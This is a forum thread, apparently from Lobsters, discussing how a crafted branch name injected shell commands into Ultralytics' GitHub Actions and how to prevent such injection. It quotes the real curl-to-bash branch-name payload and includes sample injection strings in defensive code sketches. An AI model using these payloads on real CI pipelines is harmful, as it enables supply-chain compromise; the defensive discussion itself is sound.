1. 144
    1. 77

      For those who are curious but don’t want to pick through the github issue threads:

      A malicious PR making a very innocent-looking change to the README used a branch name with shell commands in it, formatted in a way that caused CI jobs to execute those commands when performing a build for upload to PyPI. Those commands downloaded a crypto miner and embedded it into the release package.

      So the automated builds that were uploaded to PyPI had the miner, but the source on GitHub did not, and any build you produced manually by cloning the repository and running a build on your local machine would not have it either.

      It’s an interesting attack. Hopefully we’ll see a more detailed description of why a branch name from a PR was getting consumed by GitHub CI in a way that could inject commands.

      1. 46

        There was an action that echo’d the branch name without sanitizing anything: https://github.com/advisories/GHSA-7x29-qqmq-v6qc

        Another lesson in never trusting user input

        1. 58

          I don’t think “never trusting user input” is the right lesson to learn here. Why? Because I don’t think whoever wrote that code was aware they were trusting the branch name, or which properties of the branch name exactly they were trusting. So the lesson is not really actionable.

          I think the lesson is that these kinds of string-replacement based systems (YAML templates, shell variable expansion etc.) just naturally invite these issues. They are inherently unsafe and we should be teaching people to use safer alternatives instead of teaching them to be vigilant 100% of the time.

          For SQL queries, for example, the industry seems to have learned the lesson, and you’ll rightfully get ridiculed for building your queries via naive string interpolation instead of using a query builder, stored procedures or something of the sort. Now we need to realize that CI workflows, helm charts and everything else using string-level YAML templating is the same deal.
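
          For illustration, here’s roughly what that difference looks like in Python (stdlib sqlite3; the table and the hostile value are made up):

          import sqlite3

          conn = sqlite3.connect(":memory:")
          conn.execute("CREATE TABLE users (name TEXT)")
          name = "Robert'); DROP TABLE users;--"  # hostile input

          # Naive interpolation splices the input into the SQL text itself:
          # conn.execute(f"INSERT INTO users (name) VALUES ('{name}')")  # injectable

          # A parameterized query passes the value out-of-band, never as SQL:
          conn.execute("INSERT INTO users (name) VALUES (?)", (name,))
          print(conn.execute("SELECT name FROM users").fetchall())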

          The FP people have a mantra “parse, don’t validate” for consuming text. I think we need another one for producing text that’s just as snappy. Maybe “serialize, don’t sanitize”?

          1. 18

            I’m wishing for a CI/automation tool that would provide functionality like “check out a git branch” as functions in a high-level language, not as shell commands embedded in a data file, so that user input is never sent to a shell directly at all. Maybe I should make one…
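
            Something like this rough Python sketch (the helper is hypothetical): the branch name travels as an argument-vector element, so no shell ever parses it:

            import subprocess

            def checkout(branch: str) -> None:
                # argv goes straight to git; no shell ever sees the branch name
                subprocess.run(["git", "checkout", branch], check=False)

            # A hostile "branch name" stays an inert argument: git just reports
            # that no such branch exists, and nothing gets executed.
            checkout("$(curl evil.example | bash)")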

            1. 21

              Before all the hip yaml based CI systems, like github actions, pretty much everyone was using Jenkins.

              The sorta modern way to use Jenkins these days is to write a Groovy script, which has stuff like checkout scm and various other commands. Most of these come from Java plugins, so the command never goes anywhere near a shell, though you do see a lot of use of the shell command function in practice (e.g. sh "make").

              Kinda a shame that Jenkins is so wildly unpopular, and these weird yaml-based systems are what’s in vogue. Jenkins isn’t as bad as people make it out to be in my opinion.

              Please do build something though because Jenkins isn’t exactly good either, and I doubt anyone would pick Groovy as a language for anything today.

              1. 5

                I’ve used Jenkins quite a bit; it’s one of the sources of inspiration for that idea, in fact. But Groovy is a rather cursed language, especially by modern standards… it’s certainly one of my least favorite parts of Jenkins.

                My idea for a shell-less automation tool is closer to Ansible than to Jenkins but it’s just a vague idea so far. I need to summarize it and share it for a discussion sometime.

                1. 1

                  Groovy is okay. Not the best language, but way ahead of any other language I’ve ever seen in a popular CI solution. And Ansible should die.

                  1. 1

                    Have you considered Dagger?

                    edit: I just had to read a little down and someone else points you the same way…

                    1. 1

                      I haven’t heard about it before it was suggested in this thread, I’m going to give it a try.

                  2. 4

                    I doubt anyone would pick Groovy as a language for anything today.

                    I use Groovy at $DAILYJOB, and am currently learning Ruby (which has a lot more job listings than Elixir). The appeal of both languages is the same: it is incredibly easy to design DSLs with them (basically what Jenkins and Gradle use). Which is precisely what I work with at $DAILYJOB. The fact it’s JVM-based is the icing on the cake, because it’s easy to deploy in the clients’ environments.

                  3. 5

                    Dagger looks interesting for this sort of use case: https://dagger.io/

                    1. 3

                      This looks really interesting, thanks for the pointer! Maybe it’s already good for the things I want to do and I don’t need to make anything at all, or maybe I can contribute something to it.

                    2. 3

                      That’d be lovely.

                      The generation of devs that grew up on Jenkins (including myself) got used to seeing CI as “just” a bunch of shell scripts. But it’s tedious as hell, and you end up programming shell via yaml, which makes me sympathetic to vulns like these.

                      1. 3

                        Yeah in dealing with github’s yaml hell I’ve been wishing for something closer to a typed programming language with a proper library e.g. some sort of simplified-haskell DSL à la Elm, Nix, or Dhall.

                        1. 2

                          They all do? They all provide ways to build specific branches defined in yaml files or even via UIs rather than leaving that work to your shell scripts. Personally I find all those yaml meta-languages inferior to just writing a shell script. And for one and a half decades I’ve been looking for an answer to the question:

                          What’s the value of a CI server other than running a command on commit?

                          But back to your point. Why? What you need to do is sanitize user input. That is completely independent of whether it’s a shell script versus another language. Shell scripts are actually higher level than general-purpose programming languages.

                          1. 3

                            I’m certainly not saying that one doesn’t need to sanitize user input.

                            But I want the underlying system to provide a baseline level of safety. Like in Python, unless I’m calling eval() it doesn’t matter that some input may contain the character sequence os.system(...; and if I’m not calling os.system() and friends, it doesn’t matter if a string may have rm -rf in it. When absolutely any data may end up being executed as code at any time, the system has a problem, if you ask me.
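
                            Roughly, in Python terms:

                            # A hostile-looking string is inert data unless you explicitly
                            # hand it to eval()/exec() or a shell.
                            payload = "__import__('os').system('rm -rf /tmp/x')"
                            print(len(payload))   # just a string; nothing runs
                            # eval(payload)       # only this explicit step would execute it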

                          2. 2

                            Buildbot also belongs on the list of “systems old enough to predate YAML-everywhere”. It certainly has its weaknesses today, but its config is Python-based.

                          3. 12

                            In GitHub Actions specifically, there’s also a very straightforward fix: instead of interpolating a string into the shell script itself, set any values you want to use as env vars and use those instead. The value then never becomes part of the script text; the shell just reads the variable at runtime. e.g.:

                            run: |
                              echo "Bad: ${{ github.head_ref }}"
                              echo "Good: $GITHUB_HEAD_REF"
                            env:
                              GITHUB_HEAD_REF: ${{ github.head_ref }}
                            
                            1. 7

                              I don’t think string replacement systems are bad per se. Sure, suboptimal in virtually all senses. But I think the biggest issue is the lack of good defaults and of a requirement to explicitly indicate that you want the engine to do something unsafe. Consider the following in GH Actions:

                              echo "Bad: ${{ github.head_ref }}"
                              echo "Good: $GITHUB_HEAD_REF" # or so @kylewlacy says
                              

                              I do not see any major difference immediately. Compare to Pug (nee Jade):

                              Safe: #{github.head_ref}
                              Unsafe: !{github.head_ref}
                              

                              Using an unescaped string directly is clear to the reader and is not possible without an opt-in. At the same time, the opt-in is a matter of a single-char change, so one cannot decry the measure as too onerous. The mantra should be to make unescaped string usage explicit (and discouraged by default).

                              1. 13

                                But to escape a string correctly, you need to know what kind of context you’re interpolating it into. E.g. if you’re generating a YAML file with string values that are lines of shell script, you might need both shell and YAML escaping in that context, layered correctly. Which is already starting to look less like string interpolation and more like serialization.
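
                                A rough sketch of what that serialization looks like in Python (assuming PyYAML is available; the names are illustrative): quote for the shell layer, then let the YAML library handle the YAML layer:

                                import shlex
                                import yaml  # PyYAML

                                branch = "$(curl evil.example | bash)"  # hostile branch name

                                # Shell layer: quote the value so the shell sees one literal word.
                                command = "git checkout " + shlex.quote(branch)

                                # YAML layer: the serializer escapes the script text for us.
                                workflow = {"jobs": {"build": {"steps": [{"run": command}]}}}
                                print(yaml.safe_dump(workflow, sort_keys=False))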

                              2. 4

                                A few years… no, over a decade ago (jesus, time flies!) I came up with an ordered list of approaches in descending order of safety. My main mantra was “structural safety” - instead of ad-hoc escaping, try to fix the problem in a way that completely erases injection-type security issues in a structural way.

                                1. 1

                                  I’m reminded of my similar post focused more on encoding (from the same year! hooooboy).

                                  1. 1

                                    Good post! I’m happy to say that CHICKEN (finally!) does encoding correctly in version 6.

                                2. 1

                                  Serialize, don’t sanitize… I love it! I’m gonna start saying this.

                                3. 9

                                  AFAIU, the echoing is not the problem, and sanitizing wouldn’t help.

                                  The problem is that before the script is even executed, parts of its code (the ${{ ... }} stuff) are string-replaced.
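
                                  Roughly, a model of the problem in Python (not GitHub’s actual code, just the shape of it):

                                  import subprocess

                                  script_template = 'echo "Branch: ${{ github.head_ref }}"'
                                  branch = '"; echo INJECTED; echo "'  # hostile branch name

                                  # The placeholder is replaced as plain text *before* any shell runs,
                                  # so the branch name becomes part of the script's code.
                                  expanded = script_template.replace("${{ github.head_ref }}", branch)
                                  print(expanded)
                                  subprocess.run(expanded, shell=True)  # prints "Branch: " and then INJECTED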

                                  1. 1

                                      Yeah. The problem is that the echo command interprets things like ${{...}} and executes it. Or is it the shell that does it in any string? I’m not even sure, and that is the problem. No high level language does that. Javascript uses eval, which is already bad enough, but at least you can’t use it inside a string. You can probably do hello ${eval(...)} but then it is clear that you are evaluating the code inside.

                                      1. 3

                                        It’s the shell that evaluates $... syntax. $(cmd) executes cmd, ${VAR} reads the shell variable VAR, and in both cases the shell replaces the $... with the result before calling the echo program. Echo is just a dumb program that spits out the arguments it’s given.

                                        Edit: but the ${{ syntax is GitHub Actions’ own syntax; the shell doesn’t see that, as GH Actions evaluates it before running the shell command.
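
                                        You can see the split with a quick Python sketch: without a shell, echo prints the literal text; with one, the shell expands it first:

                                        import subprocess

                                        subprocess.run(["echo", "$(whoami)"])           # no shell: prints $(whoami) literally
                                        subprocess.run('echo "$(whoami)"', shell=True)  # shell expands it and prints your username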

                                      2. 1

                                        Oh thanks for explaining!

                                      3. 7

                                        The part I don’t get is how this escalated to the publish workflow; that one only seems to run off of the main branch or a workflow dispatch.

                                        1. 5

                                          cf https://lobste.rs/s/btagmw/maliciously_crafted_github_branch_name#c_4z3405 it seems they were using the pull_request_target event, which grants PR CI access to repo secrets, so they could not only inject the miner, but publish a release?

                                          Does anyone have a copy of the script so we can see what it did?

                                          Funny that they managed to mine only about $30 :)

                                          1. 10

                                            Honestly, shining a spotlight on this attack with a mostly harmless crypto miner is a great outcome.

                                            Less obvious key-stealing malware probably would have caused far more pain.

                                            1. 6

                                              I knew crypto would have great use cases eventually

                                          2. 3

                                            The pull_request_target event that was used here is privilege escalation similar to sudo – it gives you access to secrets etc.

                                            Like all privilege escalation code, this should be very carefully written, fuzzed, and audited. Certainly a shell script is exactly wrong – sh was never designed to handle untrusted input in sensitive scenarios. Really it’s on GitHub Actions for making shell script-based privilege escalation code the easy path.

                                            At the very least you want to use a language like Rust, leveraging the type system to carefully encapsulate untrusted code, along with property-based testing/fuzzing for untrusted inputs. This is an inherently serious, complex problem, and folks writing code to solve it should have to grapple with the complexity.


                                            2. 3

                                              Wow. I was looking for that kind of explanation and hadn’t found it yet. Thank you for finding and sharing it.

                                              1. 2

                                                No, the lesson is to never use bash, except to start something that is not bash.

                                                1. 1

                                                  Oh, this is probably a better top level link for this post!

                                                  1. [Comment removed by author]

                                                    1. 3

                                                      A bot made the PR? How does that work?

                                                      1. 2

                                                        I don’t know if it was a bot or not (but that is probably irrelevant). The problem in the PR lies in the branch name which executed arbitrary code during GitHub Actions. Sorry if I misunderstood your question.

                                                    2. 7

                                                      Hm, the dots don’t connect for me yet. I can just make a PR with changes to the build process, and CI would test it, but that should be fine, because PRs run without access to secrets, right?

                                                      It’s only when the PR is merged and CI is run on the main branch that secrets are available, right?

                                                      So would it be correct to say that the PR was merged into main, and, when running CI on the main branch, something echoed the branch name of recently-merged PR?

                                                      1. 15

                                                        Ah, I am confused!

                                                        See https://stackoverflow.com/questions/74957218/what-is-the-difference-between-pull-request-and-pull-request-target-event-in-git

                                                        There’s a way to opt in to triggering the workflow with main branch secrets when a PR is submitted, and that’s exactly what happened here.

                                                        1. 7

                                                          I don’t get why this option exists!

                                                          Why would you ever want to expose your secrets to a pull request on an open source project? Once you do that, they’re not actually secrets, they’re just … weakly-obscured configuration settings. This is far from the first time this github “feature” has been used to attack a project. Why do people keep turning it on? Why hasn’t github removed it?

                                                          1. 4

                                                            If I understand it correctly, I can maybe see it used in a non-public context, like for a company’s internal CI.

                                                            But for open source and public repos it makes no sense. Even if it’s not an attack like in this case, a simple “echo …” makes the secrets no longer secret.

                                                            1. 3

                                                              Prioritizing features over security makes total sense in this context! This was eloquently formulated by @indygreg! Actions:

                                                              • reduce maintenance cost for Microsoft
                                                              • increase the value of the actions platform for the users
                                                              • lock in the users into a specific platform

                                                              You clearly want them to be as powerful as possible!

                                                              1. 2

                                                                Note that the version of the workflow that’s used is the one in the target branch, not the one in the proposed branch.

                                                                There are legitimate use cases for this kind of privilege escalation, but GHA’s semiotics for it are all wrong. It should feel like a Serious, Weighty piece of code that should be carefully validated and audited. Shell scripts should be banned, not the default.

                                                          2. 2

                                                            Thanks for the explanation, I was literally about to post a question to see if I understood it correctly. I am absolutely paranoid about the Actions running on my GitHub repos; it would seem to me that a closed PR should not be involved in any workflow. While the branch name was malicious, is there also a best practice to pull out here for maintainers?

                                                            1. 8

                                                              While the branch name was malicious, is there also a best practice to pull out here for maintainers?

                                                              Don’t ever use pull_request_target trigger, and, if you do, definitely don’t give that CI job creds to publish your stuff.

                                                              The root cause here is not shell injection. The root cause is that untrusted input gets into a CI run with creds at all. Of course, GitHub Actions doesn’t do that by default, and you have to explicitly opt into this with pull_request_target. See the linked SO answer in a sibling comment, it explains the issue quite nicely.

                                                              Ah, the comment by Foxboron clarifies that what happened here is not the job directly publishing malicious code, but rather poisoning the build cache to make the main branch CI pull bad data in! Clever! So, just don’t give any permissions to pull_request_target jobs!

                                                              1. 4

                                                                My public repos don’t run CI jobs for PRs automatically; they have to be manually approved. I think this is the default. Not sure what happened in this case though.

                                                                1. 4

                                                                  By default it has to be approved for first-time contributors. Not too hard to get an easy PR merged in and get access to auto-running them.

                                                                  1. 9

                                                                    It is totally fine to run CI on PR. CI for PRs does not get to use repository secrets, unless you go out of your way to also include secrets.

                                                                    If you think your security depends on PRs not triggering CI then it is likely that either:

                                                                    • you don’t understand why your project is actually secure
                                                                    • your project is actually insecure

                                                                    GitHub’s “don’t run CI for first-time contributors” has nothing to do with security and has everything to do with using the maintainer’s human judgement to protect GitHub’s free runner compute from being used for mining crypto.

                                                                    That is, this is a feature to protect GitHub/Microsoft, not your project.

                                                                    1. 2

                                                                      Should be easily solvable by billing those minutes to the PR creator.

                                                                      I guess there is also the situation where you provide your own runner rather than buying it from Github. In that case it seems like a reasonable precaution to restrict unknown people from using it.

                                                                      1. 4

                                                                        Should be easily solvable by billing those minutes to the PR creator.

                                                                        Yes! I sympathize with GitHub for having to implement something here on short notice when this happened the first time, but I am dismayed that they never got around to implementing a proper solution here: https://matklad.github.io/2022/10/24/actions-permissions.html

                                                                        I guess there is also the situation where you provide your own runners

                                                                        Yes, the security with self-hosted runners is different. If you use non-sandboxed self-hosted runners, they should never be used for PRs.

                                                              2. 1

                                                                Thank you, that’s a great summary, and a very interesting attack vector.

                                                                It’s strange (to me) that a release would be created off of an arbitrary user-created branch, but I’m sure there’s a reason for it. In years and years of working with build automation I’ve never thought about that kind of code injection attack, so it’s something I’ll start keeping in mind when doing that kind of work.

                                                              3. 22

                                                                How can we hope to win the memory-safety war when we’re still losing the 1960s macro-substitution-injection-safety war?

                                                                1. 9

                                                                  I’m working on a full writeup on this, as well as how the Ultralytics maintainers could have likely nipped this in the bud by using a tool like zizmor to find these weaknesses ahead of time: https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-injection

                                                                  1. 1

                                                                    Is zizmor similar to https://app.stepsecurity.io/ in terms of the ruleset enforced/suggested, e.g.

                                                                    permissions:
                                                                      contents: read
                                                                    

                                                                    at the top level etc? Would be interested to hear about the differences.

                                                                    1. 3

                                                                      To my understanding, StepSecurity is a runtime instrumentation layer: you install their agent, and it (in theory) notifies you and rejects potentially malicious activities on your runner.

                                                                      zizmor is a static tool: you run it on your workflows (either locally or in CI), and you fix whatever findings it gives you.

                                                                      1. 2

                                                                        The “harden” runner from them is exactly what you are describing.

                                                                          But they also have a web app that launches a one-time audit of all your workflows and suggests changes (adding a workflow for their “harden” runner is just one of many and you are free to skip it). See https://app.stepsecurity.io/securerepo?repo=https://github.com/woodruffw/zizmor for an example. And that’s the tool I am interested in comparing to zizmor - but I guess there is only one way to find out.

                                                                        Edit: I ran zizmor against a repo I previously hardened with the StepSecurity scanner (mainly limiting the GITHUB_TOKEN permissions and hash-pinning action versions) and zizmor is excellent! It found two extra significant issues - persisted credentials and, of course, template injection (well, still not a silver bullet because one can dump the whole worker process), our highlight of the day. Thanks for a great tool, @yossarian!

                                                                        1. 1

                                                                          Thanks for mentioning StepSecurity! This is Varun, Co-Founder of StepSecurity. I wanted to provide some clarification about our platform. Specifically, vulnerabilities like script injection and Pwn Request are detected as part of the enterprise tier, but these are not auto-fixed via app.stepsecurity.io/securerepo. The securerepo tool focuses solely on applying automated fixes for issues that can be safely remediated without manual intervention.

                                                                          The excellent blog post https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-injection, mentions that this exploit exfiltrated repository credentials to webhook[dot]site. To add some context about Harden-Runner, it is specifically designed to detect such anomalous outbound calls—those not previously observed in a job, and when used in block mode, can block them in real-time. I hope this helps clarify!

                                                                          1. 1

                                                                            Ah, I wasn’t aware of their dashboard – I’m curious to hear if it provides useful insights.

                                                                            (I am not a big fan of runtime instrumentation for this kind of stuff, so I’m glad to hear this dashboard exists.)

                                                                    2. 8

                                                                      It feels really dystopian to me that every issue and PR on the Ultralytics repo gets an instant AI reply. And if you’re not a member of the org, a bot locks your post and edits it to replace the content? I know that if I was new to this, asking a genuine question about how to use it, and was met with that, I’d be scared away.

                                                                      1. 6

                                                                        Step 1: everyone’s fed up of messy spaghetti CI - create a new simple CI system based on static config files (woo YAML!)

                                                                        Step 2: we need the ability to execute arbitrarily complex workflows in CI - rub some templating and shell on your YAML

                                                                        Step 3: everyone’s fed up of messy spaghetti CI - create a new simple CI system based on static config files (woo YAML!)

                                                                        1. 5

                                                                          Looking through those posted CI logs, they were using attestations. I would be interested to know if this was detectable from the attestation.

                                                                            Re-reading the docs, it sounds like attestations only attest that “this package was built by a github action in the ultralytics repo” and not “the code in this package matches the code in this repo exactly”, which seems like a common misconception based on comments like this that say things like “Attestations provide cryptographic proof linking published packages to specific code states.”

                                                                          1. 8

                                                                              There is a fundamental difference between what attestations can do and what things like “trusted publishing” do. Currently “trusted publishing” doesn’t give you full provenance of what happened and where the code is, as the issue here is a poisoned build cache that was shared between the PR and the main branch.

                                                                            What would probably have detected this is to have reproducible builds, and an independent and clean build of the published wheel to compare against.

                                                                            1. 4

                                                                              So:

                                                                              “Trusted Publishing”, as used by PyPI, is not about “end users can trust that the package isn’t malicious”. It’s about “you, the owner/developer of the package, can trust that your CI/CD provider has only a short-lived narrow-scoped PyPI credential whose accidental exposure would not be an ongoing disaster”. In other words, it’s about letting you trust GitHub or GitLab or another CI/CD provider with permission to publish your packages.

                                                                              “Attestations” are a form of package signing. The initial use case – i.e., what’s supported so far – is verifying that a particular CI/CD provider’s Trusted Publishing flow was what uploaded the package and that the contents of the artifact you actually receive match the contents of what that flow uploaded. This, again, does not provide any guarantee to the community that a package is non-malicious or has been vetted for security issues.

                                                                              So as I understand it the “particular code states” you refer to means that the bits you download from PyPI are the same bits uploaded from the pipeline. It’s letting you trust that nobody has compromised PyPI itself and replaced the package with something different, because they would not be able to produce a valid attestation for the changed package contents claiming that it was still something that came from a TP pipeline.

                                                                              Similarly, I could set up a manually-constructed pipeline with access to a PGP key and have the pipeline sign a package; that would not tell you anything about whether the code in the package is safe or good, just that the pipeline (which is what has the key) is the thing that signed it, and the contents haven’t changed since the moment of signing. Nobody would take that as a lack of functionality in PGP, or as a cryptographic failure on the part of PGP signatures.

                                                                              1. 1

                                                                                 It surprises me that nowhere in the Trusted Publishing docs do I see an explanation of what it protects against, hence the misconceptions. Protecting against a compromise of PyPI is such a straightforward goal that its absence is confusing to me.

                                                                                Didn’t even see it in clarification posts like https://blog.yossarian.net/2024/11/18/Security-means-securing-people-where-they-are

                                                                                1. 3

                                                                                  I believe attestations are capable of doing a lot more in the future, but right now they basically are a record of provenance and integrity for packages which came from a Trusted Publishing pipeline.

                                                                                  Going into a bit more specifics, as I understand it:

                                                                                  • If you are the owner of project foo on PyPI, you can designate a particular pipeline or workflow in a particular CI/CD system (GitHub Actions, GitLab CI, etc.) as having permission to publish new releases/artifacts for foo to PyPI on your behalf.
                                                                                  • That flow is enabled by OpenID Connect (“OIDC”), which allows the CI/CD system to prove its identity to PyPI in order to obtain a short-lived API token whose permissions are narrowly scoped to “can publish foo”.

                                                                                   That’s the basic Trusted Publishing setup. What’s added by attestations is:

                                                                                  • The OIDC flow issues a JSON Web Token (JWT) in response to the publishing pipeline proving its identity.
                                                                                  • That JWT, which represents the “identity” of a particular machine running the TP workflow, is used in a Sigstore signing flow which involves issuance of both an X.509 certificate (which is committed to a public Certificate Transparency log) and a short-lived signing key.
                                                                                  • The signing key is then used to generate the signed metadata (the attestation) on the artifact which will be uploaded to PyPI.

                                                                                  This actually gives you both integrity (it’s a digital signature, so you can always check the contents of the artifact you download from PyPI against it) and provenance (you can prove not just that the artifact was uploaded from some Trusted Publishing platform, but which one and even which specific machine).

                                                                                  If a project advertises that it does Trusted Publishing via a specific CI/CD service, you gain the ability to detect compromise – if someone pops your individual PyPI account, or potentially the whole site, they still can’t retroactively generate correct attestations for existing artifacts, which means they can’t secretly swap out those artifacts with malicious versions.

                                                                                  1. 3

                                                                                    I read up a bit more on how the signature stuff works. The full process is:

                                                                                    1. Client generates a public/private keypair which will only exist in-memory and only for the duration of this signature process.
                                                                                     2. Client submits the OIDC JWT and public key to a Sigstore Fulcio CA instance.
                                                                                    3. CA hits the .well-known OIDC config URL of the JWT issuer to get keys to verify the JWT.
                                                                                    4. If JWT verification succeeds, CA verifies the client possesses the private key corresponding to the public key submitted in (2) via challenge/CSR process.
                                                                                    5. If client proves its possession of the private key, CA issues and signs an X.509 certificate with a short lifetime (10 minutes), using metadata from the OIDC JWT and embedding the public key from step (2). The certificate is published to a public Certificate Transparency log.
                                                                                     6. Client uses the private key from step (1) to produce a signature for the artifact (i.e., the package).
                                                                                     7. Client destroys the private key.

                                                                                    So the result is that the private key no longer exists and cannot be reused, but because the public key was published to the CA’s CT log as part of the process, it can always be recovered and used to verify the signature. The additional claims in the JWT are also present in the certificate and so it’s possible to verify things like which CI pipeline signed the artifact.

                                                                                    1. 1

                                                                                      Thank you for looking into it! I plan to put my money where my mouth is and contribute some docs, so this is really helpful!

                                                                                  2. 1

                                                                                    That aligns with my assessment of what “trusted publishing” and “attestations” mean in this context. I’m on the fence about how much of an improvement those represent vs the old status quo.

                                                                                2. 5

                                                                                  This is your friendly reminder that all CI is RCE As a Service.

                                                                                  1. 2

                                                                                    This looks to me like they are executing sensitive GitHub Actions workflows anytime anyone opens a PR against the main branch (e.g. the publish workflow). It isn’t in itself the vulnerability exploited here (that appears to be the fact that the branch name is evaluated in shell unescaped), but it’s a huge footgun with GHA that I’ve seen many times. IMO you should only run those kind of workflows when a commit to main is pushed (or whatever branch represents “production”) - this means that the only time a sensitive workflow runs is when a collaborator on the repo has signed off on a change and merged it. It’s still vulnerable to someone not paying attention, but way less risky than letting a random person drive by and execute your workflows with arbitrary inputs.

                                                                                    I thought GitHub automatically disabled workflow runs for people who aren’t collaborators on the repo, as another mitigation for this kind of thing, but maybe I explicitly enabled that - but again, if you aren’t paying attention, stuff like this will happen.

                                                                                    Interesting attack though, extremely visible in the PR itself, but once merged, it becomes very hard to trace.

                                                                                    1. 8

                                                                                      I thought GitHub automatically disabled workflow runs for people who aren’t collaborators on the repo

                                                                                      I’ve already said this in the discussion, but I want to repeat this as it is really important.

                                                                                      Not running workflows from non-collaborators is not a security feature. A security feature is not exposing secrets to workflows triggered by forks.

                                                                                      The problem here is not that some unexpected code got run. The problem is that it was running with access to secrets it shouldn’t have had.

                                                                                      1. 1

                                                                                        Right, exactly, sorry if that wasn’t clear from my initial comment. I’m specifically talking about running privileged workflows for randoms.

                                                                                        The part you quoted from my comment was about a mitigation GitHub implemented to try and make this mistake less easy to make (by preventing the workflows from running without explicit permission of the repo owner), but it is just a mitigation, it is still not acceptable to operate that way.

                                                                                        1. 4

                                                                                          No, this is not a mitigation for this issue. GitHub doesn’t need a mitigation here, because it does the right thing by default — workflows running on forks don’t have access to secrets.

                                                                                          If you have a workflow which runs on your main branch, and uses some token to publish your stuff to npm, this workflow will run on a fork, but it won’t be able to publish to npm, because it won’t have a token.

                                                                                          There’s no such thing as a privileged or non privileged workflow. Any workflow is arbitrary, untrusted code! What is privileged is the secrets with which a given workflow runs.

                                                                                          1. 1

                                                                                            Yes? I’m not talking about that, I’m talking about running workflows with secrets when PRs are submitted/changed by random people. GitHub not running workflows for strangers by default is a mitigation for that happening to people who don’t know better, or made a mistake in their config.

                                                                                            Workflows running without secrets in forks is a problem too, but way less problematic than with them, which is where this exploit happened IIUC.

                                                                                            1. 2

                                                                                              GitHub not running workflows for strangers by default is a mitigation for that happening to people who don’t know better, or made a mistake in their config.

                                                                                                Not really, this feature was implemented on short notice to prevent abuse of free Actions runners to mine crypto: https://github.blog/open-source/maintainers/github-actions-update-helping-maintainers-combat-bad-actors/.

                                                                                              1. 1

                                                                                                  Whether that was the intent or not, it still acts as a mitigation for that situation. A mitigation isn’t necessarily a cure-all; it can be something that simply reduces attack surface or prevents certain types of attacks, and I fail to see how not running workflows automatically isn’t a mitigation by that measure.

                                                                                                I’m not sure why you’re choosing to argue with me about this anyway, you were preaching to the choir with your first reply, and I’m in full agreement with you about the issues with GitHub Actions. As best I can tell, we’re talking past each other here.

                                                                                                1. 5

                                                                                                  It seems so indeed! I honestly can’t really identify whether we are in agreement or not, but my goal here isn’t necessarily to reach agreement with you in particular, but to highlight a specific, easy to fall for misconception for the benefit of the reader (definitely not claiming that you have this misconception, just that the wording you used can be read as suggestive of one).

                                                                                                  The misconception is that, to secure CI, you need to control what is being run, and prevent untrusted code from being executed. This is a readily believable misconception, to a large part because of this free-compute-mining mitigation. Even in this very thread, the focus is on the SQL-injection part — as if, if we just didn’t use shell, the thing would be secure.

                                                                                                  I firmly believe that this approach isn’t fruitful in the context of public forges like GitHub. CI is, by design, an RCE as a service. If you try to make it secure by making fine-grained decisions about which parts of untrusted code are fine to interact with, you are bound to fail.

                                                                                                  Instead, what is needed is to make sure that, no matter what untrusted code is being run, it can’t have any harmful side-effects. The way GitHub implements this is by making any secrets unavailable to the pull requests from forks. The crucial part of this feature is that this doesn’t require any configuration.

                                                                                                  In a world where some workflows are marked as safe to run only on main, and some as safe to run on PRs, something, somewhere will get misconfigured. Keeping trusted and untrusted parts a configuration away is just not good enough.

                                                                                                  Luckily, this is not how it works on GitHub — you can misconfigure your public workflow to run on PRs, and nothing bad would happen, because there’s security at the different layer — PRs from forks don’t get access to secrets. That is the key property — security (access to secrets) is orthogonal to the rules for triggering workflow.

                                                                                                  So this is the specific phrasing I push against:

                                                                                                  you should only run those kind of workflows when a commit to main is pushed

                                                                                                    While running such workflows on PRs is not useful, it should only be a waste of CI resources, not a security vulnerability. What you should be safeguarding, and what GitHub actually does safeguard, are the secrets that the workflow can access.

                                                                                                    Of course, GitHub allows opting in to sharing secrets by using the pull_request_target trigger (which is different from pull_request). The docs warn about the security implications sufficiently, but they could have used more syntactic salt when naming the feature, as it is effectively sudo.

                                                                                                  I guess, what I am saying can be compressed as such:

                                                                                                    “Never use pull_request_target, use only pull_request” is an effective approach to security.

                                                                                                  “Make sure that sensitive workflows are only run on main” is an ineffective approach to security.

                                                                                                  1. 4

                                                                                                    Agreed. The vulnerability in this case composed multiple exploitable issues in a chain, but fundamentally started with the use of the pull_request_target trigger.

                                                                                                    I think where we probably differ is that you say my point about limiting the contexts in which you run workflows is ineffective, but I would argue it is part of a defense in depth strategy - you’ve reduced the attack surface, and that allows you to focus your efforts.

                                                                                                    I’m also of the opinion that it is easier to open yourself up to exploits using pull_request triggers in general - because someone might think “oh, I’d sure like if PRs would run this workflow when a label is added, or when it is moved out of draft status”, add one of the pull_request_target triggers thinking it is just an extension of pull_request, and now someone can drive-by your repo and exfil secrets.

                                                                                                      Anyway, I appreciate the reply. I think clarifying things for readers who maybe aren’t as familiar with the ways this stuff can go pear-shaped is valuable - you certainly are more mindful of educating the reader than I am!

                                                                                    2. 2

                                                                                      One possible mitigation is if branch names[1] with shell-unsafe characters (e.g. ‘$’) were simply disallowed in the first place.

                                                                                      [1] Like this one: openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)
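
                                                                                      A sketch of that kind of check in Python (the allowed character set is just an example):

                                                                                      import re

                                                                                      SAFE_BRANCH = re.compile(r"^[A-Za-z0-9._/-]+$")

                                                                                      def is_safe_branch_name(name: str) -> bool:
                                                                                          return SAFE_BRANCH.fullmatch(name) is not None

                                                                                      print(is_safe_branch_name("fix/readme-typo"))                  # True
                                                                                      print(is_safe_branch_name("$({curl,-sSfL,x.sh}${IFS}|bash)"))  # False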

                                                                                      1. 2

                                                                                        I agree strongly, and am surprised that no one else is bringing the idea up — a deep problem here is that we tend to write code with a mental picture of the data that the code is manipulating, and someone writing code that deals with a branch name is thinking of a string that is vaguely slug-like: letters, numbers, some dashes. Maybe a colon or something if the project gets really crazy. But the underlying system refuses to undertake the reasonable step of actually locking down branch names to something reasonable. I’m not sure what the thinking is. That GitHub should allow anything git allows? And presumably git was following an old tradition from Unix filenames, which can contain all kinds of nonsense characters.

                                                                                        I am not sure which motivation for the system designer is stronger in cases of poor design like this: (a) the social fear that they will look dour and Puritan if they impose a rule like “branch names need to be letters, numbers and dashes”, or (b) the technical fear that someone, someday, will actually desperately need to include a semicolon and double-quote in a branch name, but won’t be able to because GitHub disallowed it, and devastation will follow because someone made an overly strict rule and treated other developers like children.

                                                                                      2. 1

